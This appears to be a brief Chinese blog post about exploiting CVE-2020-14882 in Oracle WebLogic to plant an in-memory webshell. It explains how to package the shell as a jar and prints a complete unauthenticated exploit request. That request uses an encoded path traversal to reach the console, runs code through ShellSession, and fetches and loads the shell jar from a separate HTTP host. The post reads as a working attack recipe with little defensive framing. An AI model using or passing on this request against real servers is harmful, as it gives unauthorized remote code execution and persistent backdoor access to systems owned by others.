CVE-2020-14882  Weblogic 未授权 内存马

CVE-2020-14882 Weblogic 未授权 内存马

Scroll Down

终于弄会了~ 我一个JAVA小白,代码只能理解,但是不会写!全靠copy。

感谢宽字节 potats0 老哥!和 奇安信 Cheery 老哥~

放图:
Snipaste_20201123_204050.jpg

只实现了普通的一句话马,冰蝎马和蚁剑马还没弄好(蚁剑马有点小问题)

遇到的问题:

1.代码导出成Jar包:

IDEA ————> File ————> Project Structure (快捷键:Ctrl+Alt+Shift+S)。————> 在弹出的窗口中左侧选中"Artifacts",点击"+"选择jar,然后选择"from modules with dependencies"。
image.png

然后点击+号,选择moudle output

image.png

生成class

image.png

导出jar包

image.png

POST数据包:

GET /console/css/%25%32%65%25%32%65%25%32%66consolejndi.portal?test_handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.net.URLClassLoader u = new java.net.URLClassLoader(new java.net.URL[]{new java.net.URL("http://192.168.100.120:8000/weblogic.jar")}); u.loadClass("org.unicodeSec.InjectFilterShell").newInstance(); u.close();"); HTTP/1.1
Host: 192.168.100.120:7001
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate1
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 2



对于CVE-2020-14882的理解:
image.png